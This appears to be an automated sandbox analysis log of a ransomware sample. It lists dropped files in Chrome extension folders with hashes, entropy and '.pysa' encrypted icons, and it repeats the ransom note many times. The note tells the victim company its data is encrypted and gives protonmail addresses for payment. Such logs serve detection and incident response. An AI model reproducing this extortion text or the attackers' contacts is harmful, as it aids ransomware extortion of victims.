                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_CN\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_TW\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.153945287330034
                  Encrypted:false
                  SSDEEP:96:DrKt8YIJLZ93ukziGAYOdBrU58SefMmS10qdk31YVDUQzyVmZ/:DrKmFh+IOdvDMmSn2OUG
                  MD5:FD66A1C3BE51DE03A7C2242D3C3BDC24
                  SHA1:BFE4A6EC49BB4A60A5D013520123F55FBB8AC1CF
                  SHA-256:3A25EA6D44C192E654BE568438C4432C8D222DEE6530F3DAA7F1C7D3C4DD0862
                  SHA-512:655742FF39ACC47635277EEEBE0362735691ADA0F86DB37303393274CD30B44D57EB04DBC74AF2F7A4D8E7ADC334438D4C9D1B6F1235B379C8AB20B372D10591
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8192
                  Entropy (8bit):7.598558069039041
                  Encrypted:false
                  SSDEEP:192:7tEXwH6zPX8kHYphIlLt+G9dHTLUsc9FP4+6sTEZKU692ParR6f:7tEgHq0T+hzQssshRy2SrR6f
                  MD5:C360D2AB50AAC3942D1C0F403A73ECF9
                  SHA1:A3948E947BBF96CE90DF4523317A71EBE2A04513
                  SHA-256:B782F1715E7EB85E180ECA44BEDB898FFB4999EEBF0BD33FC5EDB40332655142
                  SHA-512:F97EBB39E413818C15A510B98788B19D38A36C85E93DB275C26533E6F4EE788F7A5FB6E44102E7D03FA50B36EE4C4CE4058264CF9C048EAB8EDBC3DEE4FCA077
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ar\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ca\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\cs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\da\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\de\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\el\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\en_GB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\en_US\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\es\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\et\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\eu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fil\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\he\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\hi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\hr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\hu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\id\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\it\Readme.README
